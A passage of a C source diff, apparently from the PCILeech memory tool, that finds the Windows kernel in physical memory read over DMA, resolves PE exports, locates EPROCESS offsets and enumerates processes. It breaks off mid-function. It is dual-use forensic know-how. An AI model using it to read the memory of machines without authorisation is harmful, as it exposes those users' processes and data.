+QWORD VmmProcWindows_GetProcAddress(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD vaModule, _In_ LPSTR lpProcName)
+{
+    PDWORD pdwRVAAddrNames, pdwRVAAddrFunctions;
+    PWORD pwNameOrdinals;
+    DWORD i, cbProcName, cbExportDirectoryOffset;
+    LPSTR sz;
+    QWORD vaFnPtr;
+    QWORD vaExportDirectory;
+    DWORD cbExportDirectory;
+    PBYTE pbExportDirectory = NULL;
+    BYTE pbModuleHeader[0x1000];
+    QWORD vaRVAAddrNames, vaNameOrdinals, vaRVAAddrFunctions;
+    if(!VmmReadPage(ctxVmm, pProcess, vaModule, pbModuleHeader)) { goto cleanup; }
+    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)pbModuleHeader; // dos header.
+    if(!dosHeader || dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { goto cleanup; }
+    if(dosHeader->e_lfanew > 0x800) { goto cleanup; }
+    PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(pbModuleHeader + dosHeader->e_lfanew); // nt header
+    if(!ntHeader || ntHeader->Signature != IMAGE_NT_SIGNATURE) { goto cleanup; }
+    vaExportDirectory = vaModule + ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
+    cbExportDirectory = ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
+    if((cbExportDirectory < sizeof(IMAGE_EXPORT_DIRECTORY)) || (cbExportDirectory > 0x01000000) || (vaExportDirectory == vaModule) || (vaExportDirectory > vaModule + 0x80000000)) { goto cleanup; }
+    if(!(pbExportDirectory = LocalAlloc(0, cbExportDirectory))) { goto cleanup; }
+    if(!VmmRead(ctxVmm, pProcess, vaExportDirectory, pbExportDirectory, cbExportDirectory)) { goto cleanup; }
+    PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)pbExportDirectory;
+    if(!exp || !exp->NumberOfNames || !exp->AddressOfNames) { goto cleanup; }
+    vaRVAAddrNames = vaModule + exp->AddressOfNames;
+    vaNameOrdinals = vaModule + exp->AddressOfNameOrdinals;
+    vaRVAAddrFunctions = vaModule + exp->AddressOfFunctions;
+    if((vaRVAAddrNames < vaExportDirectory) || (vaRVAAddrNames > vaExportDirectory + cbExportDirectory - exp->NumberOfNames * sizeof(DWORD))) { goto cleanup; }
+    if((vaNameOrdinals < vaExportDirectory) || (vaNameOrdinals > vaExportDirectory + cbExportDirectory - exp->NumberOfNames * sizeof(WORD))) { goto cleanup; }
+    if((vaRVAAddrFunctions < vaExportDirectory) || (vaRVAAddrFunctions > vaExportDirectory + cbExportDirectory - exp->NumberOfNames * sizeof(DWORD))) { goto cleanup; }
+    cbProcName = (DWORD)strnlen_s(lpProcName, MAX_PATH) + 1;
+    cbExportDirectoryOffset = (DWORD)(vaExportDirectory - vaModule);
+    pdwRVAAddrNames = (PDWORD)(pbExportDirectory + exp->AddressOfNames - cbExportDirectoryOffset);
+    pwNameOrdinals = (PWORD)(pbExportDirectory + exp->AddressOfNameOrdinals - cbExportDirectoryOffset);
+    pdwRVAAddrFunctions = (PDWORD)(pbExportDirectory + exp->AddressOfFunctions - cbExportDirectoryOffset);
+    for(i = 0; i < exp->NumberOfNames; i++) {
+        if(pdwRVAAddrNames[i] - cbExportDirectoryOffset + cbProcName > cbExportDirectory) { continue; }
+        sz = (LPSTR)(pbExportDirectory + pdwRVAAddrNames[i] - cbExportDirectoryOffset);
+        if(0 == memcmp(sz, lpProcName, cbProcName)) {
+            if(pwNameOrdinals[i] >= exp->NumberOfFunctions) { goto cleanup; }
+            vaFnPtr = (QWORD)(vaModule + pdwRVAAddrFunctions[pwNameOrdinals[i]]);
+            LocalFree(pbExportDirectory);
+            return vaFnPtr;
+        }
+    }
+cleanup:
+    LocalFree(pbExportDirectory);
+    return 0;
+}
+
+/*
+* Retrieve PE module name given a PE header.
+* NB! very messy code due to lots of sanity checks on untrusted data.
+*/
+_Success_(return)
+BOOL VmmProcWindows_GetModuleName(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess, _In_ QWORD vaModule, _Out_ CHAR pbModuleName[MAX_PATH], _Out_ PDWORD pdwSize, _In_opt_ PBYTE pbPageMZHeaderPreCacheOpt, _In_ BOOL fDummyPENameOnExportDirectoryFail)
+{
+    QWORD vaExportDirectory;
+    DWORD cbExportDirectory;
+    BYTE pbModuleHeader[0x1000], pbExportDirectory[sizeof(IMAGE_EXPORT_DIRECTORY)];
+    if(pbPageMZHeaderPreCacheOpt) {
+        memcpy(pbModuleHeader, pbPageMZHeaderPreCacheOpt, 0x1000);
+    } else {
+        if(!VmmReadPage(ctxVmm, pProcess, vaModule, pbModuleHeader)) { return FALSE; }
+    }
+    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)pbModuleHeader; // dos header.
+    if(!dosHeader || dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { return FALSE; }
+    if(dosHeader->e_lfanew > 0x800) { return FALSE; }
+    PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(pbModuleHeader + dosHeader->e_lfanew); // nt header
+    if(!ntHeader || ntHeader->Signature != IMAGE_NT_SIGNATURE) { return FALSE; }
+    *pdwSize = ntHeader->OptionalHeader.SizeOfImage;
+    vaExportDirectory = vaModule + ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
+    cbExportDirectory = ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
+    if((cbExportDirectory < sizeof(IMAGE_EXPORT_DIRECTORY)) || (vaExportDirectory == vaModule)) { goto fail; }
+    if(!VmmRead(ctxVmm, pProcess, vaExportDirectory, pbExportDirectory, sizeof(IMAGE_EXPORT_DIRECTORY))) { goto fail; }
+    PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)pbExportDirectory;
+    if(!exp || !exp->Name || exp->Name > ntHeader->OptionalHeader.SizeOfImage) { goto fail; }
+    pbModuleName[MAX_PATH - 1] = 0;
+    if(!VmmRead(ctxVmm, pProcess, vaModule + exp->Name, pbModuleName, MAX_PATH - 1)) { goto fail; }
+    return TRUE;
+fail:
+    if(fDummyPENameOnExportDirectoryFail) {
+        memcpy(pbModuleName, "UNKNOWN", 8);
+        return TRUE;
+    }
+    return FALSE;
+}
+
+/*
+* Load module proc names into memory map list if possible.
+* NB! this function parallelize reads of MZ header candidates to speed things up.
+*/
+VOID VmmProcWindows_ScanHeaderPE(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pProcess)
+{
+    typedef struct tdMAP {
+        DMA_IO_SCATTER_HEADER dma;
+        PVMM_MEMMAP_ENTRY mme;
+        BYTE pb[0x1000];
+    } MAP, *PMAP;
+    PMAP pMap, pMaps;
+    PPDMA_IO_SCATTER_HEADER ppDMAs;
+    PBYTE pbBuffer;
+    DWORD i, cDMAs = 0, cbImageSize;
+    BOOL result;
+    CHAR szBuffer[MAX_PATH];
+    // 1: checks and allocate buffers for parallell read of MZ header candidates
+    if(!pProcess->cMemMap || !pProcess->pMemMap) { return; }
+    pbBuffer = LocalAlloc(LMEM_ZEROINIT, 0x400 * (sizeof(PDMA_IO_SCATTER_HEADER) + sizeof(MAP)));
+    if(!pbBuffer) { return; }
+    ppDMAs = (PPDMA_IO_SCATTER_HEADER)pbBuffer;
+    pMaps = (PMAP)(pbBuffer + 0x400 * sizeof(PDMA_IO_SCATTER_HEADER));
+    // 2: scan memory map for MZ header candidates and put them on list for read
+    for(i = 0; i < pProcess->cMemMap - 1; i++) {
+        if(
+            (pProcess->pMemMap[i].cPages == 1) &&                           // PE header is only 1 page
+            !(pProcess->pMemMap[i].AddrBase & 0xffff) &&                    // starts at even 0x10000 offset
+            !pProcess->pMemMap[i].szName[0] &&                              // name not already set
+            (pProcess->pMemMap[i].fPage & VMM_MEMMAP_FLAG_PAGE_NX) &&       // no-execute
+            !(pProcess->pMemMap[i + 1].fPage & VMM_MEMMAP_FLAG_PAGE_NX))    // next page is executable
+        {
+            pMap = pMaps + cDMAs;
+            pMap->mme = pProcess->pMemMap + i;
+            pMap->dma.cbMax = 0x1000;
+            pMap->dma.qwA = pProcess->pMemMap[i].AddrBase;
+            pMap->dma.pb = pMap->pb;
+            ppDMAs[cDMAs] = &pMap->dma;
+            cDMAs++;
+            if(cDMAs == 0x400) { break; }
+        }
+    }
+    // 3: read all MZ header candicates previously selected and try load name from them (after read is successful)
+    VmmReadScatterVirtual(ctxVmm, pProcess, ppDMAs, cDMAs);
+    for(i = 0; i < cDMAs; i++) {
+        if(pMaps[i].dma.cb == 0x1000) {
+            pMap = pMaps + i;
+            result = VmmProcWindows_GetModuleName(ctxVmm, pProcess, pMap->mme->AddrBase, szBuffer, &cbImageSize, pMap->pb, TRUE);
+            if(result && (cbImageSize < 0x01000000)) {
+                VmmMapTag(ctxVmm, pProcess, pMap->mme->AddrBase, pMap->mme->AddrBase + cbImageSize, szBuffer, NULL);
+            }
+        }
+    }
+    LocalFree(pbBuffer);
+}
+
+#define VMMPROC_EPROCESS_MAX_SIZE 0x500
+
+/*
+* Very ugly hack that tries to locate some offsets required withn the EPROCESS struct.
+*/
+_Success_(return)
+BOOL VmmProcWindows_OffsetLocatorEPROCESS(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pSystemProcess, 
+    _Out_ PDWORD pdwoState, _Out_ PDWORD pdwoPML4, _Out_ PDWORD pdwoName, _Out_ PDWORD pdwoPID, _Out_ PDWORD pdwoFLink, _Out_ PDWORD pdwoPEB)
+{
+    BOOL f;
+    DWORD i;
+    QWORD va1;
+    BYTE pb0[VMMPROC_EPROCESS_MAX_SIZE], pb1[VMMPROC_EPROCESS_MAX_SIZE];
+    if(!VmmRead(ctxVmm, pSystemProcess, pSystemProcess->os.win.vaEPROCESS, pb0, 0x500)) { return FALSE; }
+    if(ctxVmm->ctxPcileech->cfg->fVerboseExtra) {
+        printf("vmmproc.c!VmmProcWindows_OffsetLocatorEPROCESS: %016llx %016llx\n", pSystemProcess->paPML4, pSystemProcess->os.win.vaEPROCESS);
+        Util_PrintHexAscii(pb0, VMMPROC_EPROCESS_MAX_SIZE, 0);
+    }
+    // find offset State (static for now)
+    if(*(PDWORD)(pb0 + 0x04)) { return FALSE; }
+    *pdwoState = 0x04;
+    // find offset PML4 (static for now)
+    if(pSystemProcess->paPML4 != (0xfffffffffffff000 & *(PQWORD)(pb0 + 0x28))) { return FALSE; }
+    *pdwoPML4 = 0x28;
+    // find offset for Name
+    for(i = 0, f = FALSE; i < VMMPROC_EPROCESS_MAX_SIZE - 8; i += 8) {
+        if(*(PQWORD)(pb0 + i) == 0x00006D6574737953) {
+            *pdwoName = i;
+            f = TRUE;
+            break; 
+        }
+    }
+    if(!f) { return FALSE; }
+    // find offset for PID, FLink, BLink (assumed to be following eachother)
+    for(i = 0, f = FALSE; i < VMMPROC_EPROCESS_MAX_SIZE - 8; i += 8) {
+        if(*(PQWORD)(pb0 + i) == 4) {
+            // PID = correct, this is a candidate
+            if(0xffff000000000000 != (0xffff000000000003 & *(PQWORD)(pb0 + i + 8))) { continue; }    // FLink not valid kernel pointer
+            va1 = *(PQWORD)(pb0 + i + 8) - i - 8;
+            f = VmmRead(ctxVmm, pSystemProcess, va1, pb1, VMMPROC_EPROCESS_MAX_SIZE);
+            if(!f) { continue; }
+            f = FALSE;
+            if( (*(PQWORD)(pb1 + *pdwoName) != 0x6578652e73736d73) && // smss.exe
+                (*(PQWORD)(pb1 + *pdwoName) != 0x5320657275636553))   // Secure System
+            {
+                continue;
+            }
+            if((*(PQWORD)(pb1 + i + 16) - i - 8) != pSystemProcess->os.win.vaEPROCESS) { 
+                continue;
+            }
+            *pdwoPID = i;
+            *pdwoFLink = i + 8;
+            f = TRUE;
+            break;
+        }
+    }
+    if(!f) { return FALSE; }
+    // find offset for PEB (in EPROCESS)
+    if(*(PQWORD)(pb1 + *pdwoName) == 0x5320657275636553) { 
+        // Secure System have no PEB -> move forward in EPROCESS list to resolve!
+        va1 = *(PQWORD)(pb1 + *pdwoFLink) - *pdwoFLink;
+        f = VmmRead(ctxVmm, pSystemProcess, va1, pb1, VMMPROC_EPROCESS_MAX_SIZE);
+        if(!f) { return FALSE; }
+    }
+    for(i = 0x300, f = FALSE; i < 0x480; i += 8) {
+        if(*(PQWORD)(pb0 + i)) { continue; }
+        if(!*(PQWORD)(pb1 + i)) { continue; }
+        if(*(PQWORD)(pb1 + i) & 0xffffff0000000fff) { continue; }
+        *pdwoPEB = i;
+        f = TRUE;
+        break;
+    }
+    return f;
+}
+
+/*
+* Try walk the EPROCESS list in the Windows kernel to enumerate processes into
+* the VMM/PROC file system.
+* NB! This may be done to refresh an existing PID cache hence migration code.
+* -- ctxVmm
+* -- pSystemProcess
+* -- return
+*/
+BOOL VmmProcWindows_EnumerateEPROCESS(_Inout_ PVMM_CONTEXT ctxVmm, _In_ PVMM_PROCESS pSystemProcess)
+{
+    DWORD dwoState, dwoPML4, dwoName, dwoPID, dwoFLink, dwoPEB, dwoMax;
+    PQWORD pqwPML4, pqwFLink, pqwPEB;
+    PDWORD pdwState, pdwPID;
+    LPSTR szName;
+    BYTE pb[VMMPROC_EPROCESS_MAX_SIZE];
+    BOOL result, fSystem;
+    PVMM_PROCESS pVmmProcess;
+    QWORD vaSystemEPROCESS, vaEPROCESS, cPID = 0;
+    // retrieve offsets
+    vaSystemEPROCESS = pSystemProcess->os.win.vaEPROCESS;
+    result = VmmProcWindows_OffsetLocatorEPROCESS(ctxVmm, pSystemProcess, &dwoState, &dwoPML4, &dwoName, &dwoPID, &dwoFLink, &dwoPEB);
+    if(!result) { 
+        printf("VmmProc: Unable to locate EPROCESS offsets.\n");
+        return FALSE;
+    }
+    if(ctxVmm->ctxPcileech->cfg->fVerboseExtra) {
+        printf("vmmproc.c!VmmProcWindows_EnumerateEPROCESS: %016llx %016llx\n", pSystemProcess->paPML4, vaSystemEPROCESS);
+    }
+    dwoMax = min(VMMPROC_EPROCESS_MAX_SIZE, 16 + max(max(dwoState, dwoPID), max(max(dwoPML4, dwoFLink), max(dwoName, dwoPEB))));
+    pdwState = (PDWORD)(pb + dwoState);
+    pdwPID = (PDWORD)(pb + dwoPID);
+    pqwPML4 = (PQWORD)(pb + dwoPML4);
+    pqwFLink = (PQWORD)(pb + dwoFLink);
+    szName = (LPSTR)(pb + dwoName);
+    pqwPEB = (PQWORD)(pb + dwoPEB);
+    // SCAN!
+    if(!VmmRead(ctxVmm, pSystemProcess, vaSystemEPROCESS, pb, dwoMax)) { return FALSE; }
+    vaEPROCESS = vaSystemEPROCESS;
+    while(TRUE) {
+        cPID++;
+        fSystem = (*pdwPID == 4);
+        // NB! Windows/Dokany does not support full 64-bit sizes on files, hence
+        // the max value 0x0001000000000000 for kernel space. Top 16-bits (ffff)
+        // are sign extended anyway so this should be fine if user skips them.
+        pVmmProcess = VmmProcessCreateEntry(
+            ctxVmm,
+            *pdwPID,
+            *pdwState,
+            ~0xfff & *pqwPML4,
+            szName,
+            !fSystem,
+            fSystem);
+        if(pVmmProcess) {
+            pVmmProcess->os.win.vaEPROCESS = vaEPROCESS;
+            pVmmProcess->os.win.vaPEB = *pqwPEB;
+            if(ctxVmm->ctxPcileech->cfg->fVerboseExtra) {
+                printf("vmmproc.c!VmmProcWindows_EnumerateEPROCESS: %016llx %016llx %016llx %08x %s\n",
+                    pVmmProcess->paPML4,
+                    pVmmProcess->os.win.vaEPROCESS,
+                    pVmmProcess->os.win.vaPEB,
+                    pVmmProcess->dwPID,
+                    pVmmProcess->szName);
+            }
+        } else {
+            szName[14] = 0; // in case of bad string data ...
+            printf("VMM: Skipping process due to parsing error.\n     PML4: %016llx PID: %i STATE: %i EPROCESS: %016llx NAME: %s\n", ~0xfff & *pqwPML4, *pdwPID, *pdwState, vaEPROCESS, szName);
+        }
+        vaEPROCESS = *pqwFLink - dwoFLink;
+        if(vaEPROCESS == vaSystemEPROCESS) {
+            break;
+        }
+        if(!VmmRead(ctxVmm, pSystemProcess, vaEPROCESS, pb, dwoMax)) {
+            break;
+        }
+        if(*pqwPML4 & 0xffffff0000000000) {
+            break;
+        }
+        if(0xffff000000000000 != (0xffff000000000003 & *pqwFLink)) {
+            break;
+        }
+    }
+    VmmProcessCreateFinish(ctxVmm);
+    return (cPID > 10);
+}
+
+// ----------------------------------------------------------------------------
+// WINDOWS SPECIFIC IMAGE IDENTIFYING BELOW
+// ----------------------------------------------------------------------------
+
+/*
+* Find and validate the low stub (loaded <1MB if exists).   The low stub almost
+* always exists on real hardware. It may be missing on virtual machines though.
+* Upon success the PML4 and ntoskrnl.ese KernelEntry point are returned.
+* NB! KernelEntry != Kernel Base
+*/
+_Success_(return)
+BOOL VmmProcWindows_FindValidateLowStub(_Inout_ PPCILEECH_CONTEXT ctx, _Out_ PQWORD ppaPML4, _Out_ PQWORD pvaKernelEntry)
+{
+    PBYTE pbLowStub;
+    DWORD o;
+    if(!(pbLowStub = LocalAlloc(LMEM_ZEROINIT, 0x100000))) { return FALSE; }
+    DeviceReadDMAEx(ctx, 0, pbLowStub, 0x100000, NULL, 0);
+    o = 0;
+    while(o < 0x100000) {
+        o += 0x1000;
+        if(0x00000001000600E9 != (0xffffffffffff00ff & *(PQWORD)(pbLowStub + o + 0x000))) { continue; } // START BYTES
+        if(0xfffff80000000000 != (0xfffff80000000000 & *(PQWORD)(pbLowStub + o + 0x070))) { continue; } // KERNEL ENTRY
+        if(0xffffff0000000fff & *(PQWORD)(pbLowStub + o + 0x0a0)) { continue; }                         // PML4
+        *ppaPML4 = *(PQWORD)(pbLowStub + o + 0x0a0);
+        *pvaKernelEntry = *(PQWORD)(pbLowStub + o + 0x070);
+        LocalFree(pbLowStub);
+        return TRUE;
+    }
+    LocalFree(pbLowStub);
+    return FALSE;
+}
+
+/*
+* see VmmProcPHYS_ScanWindowsKernel_LargePages for more information!
+* Scan a page table hierarchy between virtual addresses between vaMin and vaMax
+* for the first occurence of large 2MB pages. This is usually the ntoskrnl.exe
+* if the OS is Windows. Ntoskrnl.exe is loaded between the virtual addresses:
+* 0xFFFFF80000000000-0xFFFFF803FFFFFFFF
+* -- ctxVmm,
+* -- paTable = set to: physical address of PML4
+* -- vaBase = set to 0
+* -- vaMin = 0xFFFFF80000000000 (if windows kernel)
+* -- vaMax = 0xFFFFF803FFFFFFFF (if windows kernel)
+* -- cPML = set to 4
+* -- pvaBase
+* -- pcbSize
+*/
+VOID VmmProcPHYS_ScanWindowsKernel_LargePages_PageTableWalk(_Inout_ PVMM_CONTEXT ctxVmm, _In_ QWORD paTable, _In_ QWORD vaBase, _In_ QWORD vaMin, _In_ QWORD vaMax, _In_ BYTE cPML, _Inout_ PQWORD pvaBase, _Inout_ PQWORD pcbSize)
+{
+    const QWORD PML_REGION_SIZE[5] = { 0, 12, 21, 30, 39 };
+    QWORD i, pte, *ptes, vaCurrent, vaSizeRegion;
+    ptes = (PQWORD)VmmTlbGetPageTable(ctxVmm, paTable, FALSE);
+    if(!ptes) { return; }
+    if(cPML == 4) {
+        *pvaBase = 0;
+        *pcbSize = 0;
+        if(!VmmTlbPageTableVerify(ctxVmm, (PBYTE)ptes, paTable, TRUE)) { return; }
+        vaBase = 0;
+    }
+    for(i = 0; i < 512; i++) {
+        // address in range
+        vaSizeRegion = 1ULL << PML_REGION_SIZE[cPML];
+        vaCurrent = vaBase + (i << PML_REGION_SIZE[cPML]);
+        vaCurrent |= (vaCurrent & 0x0000800000000000) ? 0xffff000000000000 : 0; // sign extend
+        if(*pvaBase && (vaCurrent >(*pvaBase + *pcbSize))) { return; }
+        if(vaCurrent < vaMin) { continue; }
+        if(vaCurrent > vaMax) { return; }
+        // check PTEs
+        pte = ptes[i];
+        if(!(pte & 0x01)) { continue; }     // NOT VALID
+        if(cPML == 2) {
+            if(!(pte & 0x80)) { continue; }
+            if(!*pvaBase) { *pvaBase = vaCurrent; }
+            *pcbSize += 0x200000;
+            continue;
+        } else {
+            if(pte & 0x80) { continue; }    // PS = 1
+            VmmProcPHYS_ScanWindowsKernel_LargePages_PageTableWalk(ctxVmm, pte & 0x0000fffffffff000, vaCurrent, vaMin, vaMax, cPML - 1, pvaBase, pcbSize);
+        }
+    }
+}
+
+/*
+* Sometimes the PageDirectoryBase (PML4) is known, but the kernel location may
+* be unknown. This functions walks the page table in the area in which ntorkrnl
+* is loaded (0xFFFFF80000000000-0xFFFFF803FFFFFFFF) looking for 2MB large pages
+* If an area in 2MB pages are found it is scanned for the ntoskrnl.exe base.
+* -- ctxVmm
+* -- paPML4
+* -- return = virtual address of ntoskrnl.exe base if successful, otherwise 0.
+*/
+QWORD VmmProcPHYS_ScanWindowsKernel_LargePages(_Inout_ PVMM_CONTEXT ctxVmm, _In_ QWORD paPML4)
+{
+    PBYTE pbBuffer;
+    QWORD p, o, vaCurrentMin, vaBase, cbSize;
+    PVMM_PROCESS pSystemProcess = NULL;
+    BOOL fINITKDBG, fPOOLCODE;
+    vaCurrentMin = 0xFFFFF80000000000;     // base of windows kernel possible location
+    while(TRUE) {
+        VmmProcPHYS_ScanWindowsKernel_LargePages_PageTableWalk(ctxVmm, paPML4, 0, vaCurrentMin, 0xFFFFF803FFFFFFFF, 4, &vaBase, &cbSize);
+        if(!vaBase) { return 0; }
+        vaCurrentMin = vaBase + cbSize;
+        if(cbSize <= 0x00400000) { continue; }  // too small
+        if(cbSize >= 0x01000000) { continue; }  // too big
+        if(!pSystemProcess) {
+            pSystemProcess = VmmProcessCreateEntry(ctxVmm, 4, 0, paPML4, "System", FALSE, FALSE);
+            if(!pSystemProcess) { return 0; }
+            VmmProcessCreateFinish(ctxVmm);
+        }
+        // try locate ntoskrnl.exe base inside suggested area
+        pbBuffer = (PBYTE)LocalAlloc(0, cbSize);
+        if(!pbBuffer) { return 0; }
+        VmmReadEx(ctxVmm, pSystemProcess, vaBase, pbBuffer, (DWORD)cbSize, NULL);
+        for(p = 0; p < cbSize; p += 0x1000) {
+            if(*(PWORD)(pbBuffer + p) != 0x5a4d) { continue; }
+            // check if module header contains INITKDBG and POOLCODE
+            fINITKDBG = FALSE;
+            fPOOLCODE = FALSE;
+            for(o = 0; o < 0x1000; o += 8) {
+                if(*(PQWORD)(pbBuffer + p + o) == 0x4742444B54494E49) { // INITKDBG
+                    fINITKDBG = TRUE;
+                }
+                if(*(PQWORD)(pbBuffer + p + o) == 0x45444F434C4F4F50) { // POOLCODE
+                    fPOOLCODE = TRUE;
+                }
+                if(fINITKDBG && fPOOLCODE) {
+                    LocalFree(pbBuffer);
+                    return vaBase + p;
+                }
+            }
+        }
+        LocalFree(pbBuffer);
+    }
+}
+
+/*
+* Try initialize the VMM from scratch with new WINDOWS support.
+*/
+BOOL VmmProcWindows_TryInitialize(_Inout_ PPCILEECH_CONTEXT ctx, _In_opt_ QWORD paPML4Opt, _In_opt_ QWORD vaKernelBaseOpt)
+{
+    BOOL result;
+    PVMM_PROCESS pSystemProcess;
+    QWORD paPML4, vaKernelEntry, vaKernelBase, vaPsInitialSystemProcess, vaSystemEPROCESS;
+    PVMM_CONTEXT ctxVmm = (PVMM_CONTEXT)ctx->hVMM;
+    // Fetch Directory Base (PML4) and Kernel Entry (if optional hints not supplied)
+    if(!paPML4Opt || !vaKernelBaseOpt) {
+        result = VmmProcWindows_FindValidateLowStub(ctx, &paPML4, &vaKernelEntry);
+        if(!result) {
+            if(ctx->cfg->fVerbose) { printf("VmmProc: Initialization Failed. Bad data #1.\n"); }
+            return FALSE;
+        }
+        vaKernelBase = 0;
+    } else {
+        paPML4 = paPML4Opt;
+        vaKernelBase = vaKernelBaseOpt; // not entry here, but at least inside kernel ...
+    }
+    // Spider PML4 to speed things up
+    VmmTlbSpider(ctxVmm, paPML4, FALSE);
+    // Pre-initialize System PID (required by VMM)
+    pSystemProcess = VmmProcessCreateEntry(ctxVmm, 4, 0, paPML4, "System", FALSE, TRUE);
+    VmmProcessCreateFinish(ctxVmm);
+    if(!pSystemProcess) {
+        if(ctx->cfg->fVerbose) { printf("VmmProc: Initialization Failed. #4.\n"); }
+        return FALSE;
+    }
+    // Locate Kernel Base (if required)
+    if(!vaKernelBase) {
+        vaKernelBase = VmmProcWindows_FindNtoskrnl(ctxVmm, pSystemProcess, vaKernelEntry);
+        if(!vaKernelBase) {
+            if(ctx->cfg->fVerbose)      { printf("VmmProc: Initialization Failed. Unable to locate kernel #5\n"); }
+            if(ctx->cfg->fVerboseExtra) { printf("VmmProc: PML4: 0x%016llx PTR: %016llx\n", pSystemProcess->paPML4, vaKernelEntry); }
+            return FALSE;
+        }
+    }
+    if(ctx->cfg->fVerboseExtra) { printf("VmmProc: INFO: Kernel Base located at %016llx.\n", vaKernelBase); }
+    // Locate System EPROCESS
+    vaPsInitialSystemProcess = VmmProcWindows_GetProcAddress(ctxVmm, pSystemProcess, vaKernelBase, "PsInitialSystemProcess");
+    result = VmmRead(ctxVmm, pSystemProcess, vaPsInitialSystemProcess, (PBYTE)&vaSystemEPROCESS, 8);
+    if(!result) {
+        if(ctx->cfg->fVerbose) { printf("VmmProc: Initialization Failed. Unable to locate EPROCESS. #6\n"); }
+        return FALSE;
+    }
+    pSystemProcess->os.win.vaEPROCESS = vaSystemEPROCESS;
+    if(ctx->cfg->fVerboseExtra) { printf("VmmProc: INFO: PsInitialSystemProcess located at %016llx.\n", vaPsInitialSystemProcess); }
+    if(ctx->cfg->fVerboseExtra) { printf("VmmProc: INFO: EPROCESS located at %016llx.\n", vaSystemEPROCESS); }
+    // Enumerate processes
+    result = VmmProcWindows_EnumerateEPROCESS(ctxVmm, pSystemProcess);
+    if(!result) {
+        if(ctx->cfg->fVerbose) { printf("VmmProc: Initialization Failed. Unable to walk EPROCESS. #7\n"); }
+        return FALSE;
+    }
+    ctxVmm->fWin = TRUE;
+    return TRUE;
+}
+
+// ----------------------------------------------------------------------------
+// GENERIC PROCESS RELATED FUNCTIONALITY BELOW:
+// ----------------------------------------------------------------------------
+
+/*
+* Try initialize from user supplied CR3/PML4 supplied in parameter at startup.
+* -- ctx
+* -- return
+*/
+BOOL VmmProcUserCR3TryInitialize(_Inout_ PVMM_CONTEXT ctxVmm)
+{
+    PVMM_PROCESS pProcess;
+    pProcess = VmmProcessCreateEntry(ctxVmm, 0, 0, ctxVmm->ctxPcileech->cfg->qwCR3, "unknown_process", FALSE, TRUE);
+    VmmProcessCreateFinish(ctxVmm);
+    if(!pProcess) {
+        if(ctxVmm->ctxPcileech->cfg->fVerbose) { printf("VmmProc: FAIL: Initialization of Process failed from user-defined CR3 %016llx. #4.\n", ctxVmm->ctxPcileech->cfg->qwCR3); }
+        return FALSE;
+    }
+    VmmTlbSpider(ctxVmm, pProcess->paPML4, FALSE);
+    ctxVmm->fUnknownX64 = TRUE;
+    return TRUE;
+}
+
+#define VMMPROC_UPDATERTHREAD_PERIOD                50
+#define VMMPROC_UPDATERTHREAD_PHYSCACHE             (500 / VMMPROC_UPDATERTHREAD_PERIOD)            // 0.5s
+#define VMMPROC_UPDATERTHREAD_PROC_REFRESHLIST      (5 * 1000 / VMMPROC_UPDATERTHREAD_PERIOD)       // 5s
+#define VMMPROC_UPDATERTHREAD_TLB                   (15 * 1000 / VMMPROC_UPDATERTHREAD_PERIOD)      // 15s
+#define VMMPROC_UPDATERTHREAD_PROC_REFRESHTOTAL     (15 * 1000 / VMMPROC_UPDATERTHREAD_PERIOD)      // 15s
+
+DWORD VmmProcCacheUpdaterThread(_Inout_ PVMM_CONTEXT ctxVmm)
+{
+    QWORD i = 0;
+    BOOL fPHYS, fTLB, fProcList, fProcTotal;
+    PVMM_PROCESS pSystemProcess;
+    QWORD paSystemPML4, vaSystemEPROCESS;
+    if(ctxVmm->ctxPcileech->cfg->fVerbose) { 
+        printf("VmmProc: Start periodic cache flushing.\n"); 
+    }
+    while(ctxVmm->ThreadProcCache.fEnabled) {
+        Sleep(VMMPROC_UPDATERTHREAD_PERIOD);
+        i++;
+        fTLB = !(i % VMMPROC_UPDATERTHREAD_PHYSCACHE);
+        fPHYS = !(i % VMMPROC_UPDATERTHREAD_PHYSCACHE);
+        fProcTotal = !(i % VMMPROC_UPDATERTHREAD_PROC_REFRESHTOTAL);
+        fProcList = !(i % VMMPROC_UPDATERTHREAD_PROC_REFRESHLIST) && !fProcTotal;
+        EnterCriticalSection(&ctxVmm->MasterLock);
+        // PHYS / TLB cache clear
+        if(fPHYS || fTLB) {
+            VmmCacheClear(ctxVmm, fTLB, fPHYS);
+        }
+        // refresh proc list
+        if(fProcList) {
+            // Windows OS
+            if(ctxVmm->fWin) {
+                pSystemProcess = VmmProcessGet(ctxVmm, 4);
+                if(pSystemProcess) {
+                    VmmProcWindows_EnumerateEPROCESS(ctxVmm, pSystemProcess);
+                    if(ctxVmm->ctxPcileech->cfg->fVerboseExtra) {
+                        printf("VmmProc: vmmproc.c!VmmProcCacheUpdaterThread FlushProcessList\n");
+                    }
+                }
+            }
+        }
+        // total refresh of entire proc cache
+        if(fProcTotal) {
+            // Windows OS
+            if(ctxVmm->fWin) {
+                pSystemProcess = VmmProcessGet(ctxVmm, 4);
+                if(pSystemProcess) {
+                    paSystemPML4 = pSystemProcess->paPML4;
+                    vaSystemEPROCESS = pSystemProcess->os.win.vaEPROCESS;
+                    // purge existing process entries
+                    VmmProcessCreateTable(ctxVmm);
+                    // spider TLB and set up initial system process and enumerate EPROCESS
+                    VmmTlbSpider(ctxVmm, paSystemPML4, FALSE);
